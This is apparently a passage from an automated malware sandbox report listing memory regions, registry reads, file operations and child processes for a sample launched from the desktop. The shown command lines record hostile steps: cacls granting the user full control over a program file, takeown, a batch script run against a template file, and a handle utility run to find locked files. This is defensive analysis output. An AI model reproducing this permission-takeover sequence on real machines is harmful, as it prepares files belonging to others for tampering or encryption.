| sortdefault.nls | 0x04ff0000 | 0x05326fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb40000 | 0x7eb40000 | 0x7ec3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ec40000 | 0x7ec40000 | 0x7ec62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ec67000 | 0x7ec67000 | 0x7ec67fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec68000 | 0x7ec68000 | 0x7ec68fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec6a000 | 0x7ec6a000 | 0x7ec6cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec6d000 | 0x7ec6d000 | 0x7ec6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #128: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #128 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa4c |
| Parent PID | 0xb1c (c:\windows\syswow64\cacls.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A14
0x
228
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000370000 | 0x00370000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x0037ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x00383fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00391fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00393fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00443fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00450fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x00461fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x004f0000 | 0x004f1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00510000 | 0x005cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00830000 | 0x00839fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x0483ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04840000 | 0x04b76fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74710000 | 0x74737fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3b0000 | 0x7f3b0000 | 0x7f4affff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4b0000 | 0x7f4b0000 | 0x7f4d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f4d6000 | 0x7f4d6000 | 0x7f4d8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4d9000 | 0x7f4d9000 | 0x7f4d9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4da000 | 0x7f4da000 | 0x7f4dafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f4dd000 | 0x7f4dd000 | 0x7f4dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #129: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #129 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:42, Reason: Child Process |
| Unmonitor | End Time: 00:03:24, Reason: Self Terminated |
| Monitor Duration | 00:00:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x57c |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FB4
0x
618
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a30000 | 0x00a30000 | 0x04a2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a30000 | 0x04a30000 | 0x04a3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04a53fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a60000 | 0x04a60000 | 0x04a73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bc0000 | 0x04bc0000 | 0x04bc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bd0000 | 0x04bd0000 | 0x04bd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004be0000 | 0x04be0000 | 0x04be1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c10000 | 0x04ccdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05120000 | 0x05456fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec80000 | 0x7ec80000 | 0x7ed7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7eda2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eda6000 | 0x7eda6000 | 0x7eda8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eda9000 | 0x7eda9000 | 0x7eda9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edac000 | 0x7edac000 | 0x7edaefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edaf000 | 0x7edaf000 | 0x7edaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 184, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xcec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xc8c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xbd8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Shorthand.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Shorthand.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #131: g13k6qzj.exe
179
0
| Information | Value |
|---|---|
| ID | #131 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:43, Reason: Child Process |
| Unmonitor | End Time: 00:02:53, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf8 |
| Parent PID | 0x768 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BEC
0x
708
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x002adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00857fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x01deffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
